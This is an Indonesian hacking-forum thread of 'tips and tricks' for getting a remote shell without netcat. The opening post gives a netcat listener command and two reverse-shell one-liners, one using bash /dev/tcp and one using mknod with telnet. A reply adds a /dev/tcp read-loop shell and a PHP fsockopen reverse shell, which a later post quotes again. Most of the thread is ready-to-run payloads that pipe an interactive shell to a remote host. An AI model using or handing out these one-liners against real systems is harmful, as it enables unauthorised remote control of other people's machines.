NETCAT-ing tanpa NETCAT
#1
Assalamualaikum . Smile
selamat sore semuanya. sebelumnya maaf untuk judul yang kurang jelas. hehehhe secara konvensional, kalo kita mau melakukan koneksi antara dua komputer menggunakan netcat, biasanya ada yg menjalankan netcat dalam mode listening dan di sisi lain ada yg ngeBIND port yg sedang dalam mode listening tadi.

comp 1 (172.16.1.128) - listening pada port 8080
[shcode=bash]
nc -l -n -vv -p 8080
[/shcode]

comp2 (172.16.1.1) - ng-BIND port pada comp1 yang sudah dalam mode listening (8080)
[shcode=bash]
nc -v 172.16.1.128 8080
[/shcode]

kalo ngak salah sih biasanya seperti itu ... Big Grin

nah sekarang bagaimana kalo kita mencoba dengan cara yang lain ... misal kondisinya comp2 tidak punya netcat dan mau kita remote, di comp1 doang yang ada netcat nya .. Big Grin

kita jalan kan netcat di comp1 dalam mode listening
[shcode=bash]
nc -l -n -vv -p 8080
[/shcode]

nah kita ke comp2, tanpa netcat tapi dengan bash syntax
[shcode=bash]
/bin/bash -i > /dev/tcp/172.16.1.128/8080 0<&1 2>&1
[/shcode]

172.16.1.128 > ip address comp1

berikut SS nya .. Smile
[Image: netcat.png]
kita coba cara lain lagi yak .. Big Grin
kembalikan lagi comp1 dalam mode listening
[shcode=bash]
nc -l -n -vv -p 8080
[/shcode]

nah bash syntax yg lain kita jalan kan di comp2
[shcode=bash]
mknod backpipe p && telnet 172.16.1.128 8080 0<backpipe | /bin/bash 1>backpipe
[/shcode]

ini SS nya
[Image: netcat1.png]

itu aja mungkin dlu tips & trik nya .. weeww tips trik .. penting ngak penting sih .. sekian .. Smile

#2
keren lah. Hehe baru tau metode ginian. +1 dah.

Oh ya, tu kan kl back conect, kalo misal mw bwt listening tanpa pake nc gmn? :d

#3
Pada dasarnya netcat sama seperti telnet Smile
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#4
saya tambah lagi ya mas ^_^
Code:
$ exec 5<>/dev/tcp/IPtarget/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done
----------
Code:
$ php -r '$sock=fsockopen("IPtarget",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

:-bd \m/ :-bd >Big Grin< :-bd
<<< Ayam Betina Dari Timur >>>

#5
(11-19-2012, 02:00 PM)mrs.geena Wrote: saya tambah lagi ya mas ^_^
Code:
$ exec 5<>/dev/tcp/IPtarget/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done
----------
Code:
$ php -r '$sock=fsockopen("IPtarget",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

:-bd \m/ :-bd >Big Grin< :-bd

thanks mrs.geena .. Big Grin nice ... beneran MRS kan ?? Big Grin hehehhehehe






Users browsing this thread: 1 Guest(s)